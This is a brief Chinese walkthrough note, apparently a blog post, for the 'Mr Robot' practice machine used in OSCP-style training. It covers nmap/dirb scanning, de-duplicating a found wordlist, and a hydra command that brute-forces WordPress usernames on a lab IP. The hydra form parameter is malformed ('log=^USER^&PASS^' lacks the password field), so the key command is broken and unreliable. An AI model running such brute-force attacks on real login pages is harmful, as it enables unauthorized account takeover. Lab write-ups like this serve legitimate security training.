第一步:nmap与dirb
fsocity.dic这个可能是用户或者密码的字典,发现内部存在大量重复数据
cat fsocity.dic | sort | uniq > fsocietyuniq
进入登录界面test/test登录
第二步:使用hydra进行用户名密码暴力破解
Invalid username 不存在该用户名 F=不存在这个的
hydra -L fsocietyuniq -p test 192.168.107.146 http-post-form '/wp-login.php:log=^USER^&PASS^&wp-submit=Log+In:F=Invalid username'
标签:fsocietyuniq,Invalid,mrRobot,hydra,wp,test,靶机,fsocity,OSCP From: https://www.cnblogs.com/justdoIT20680/p/17880169.html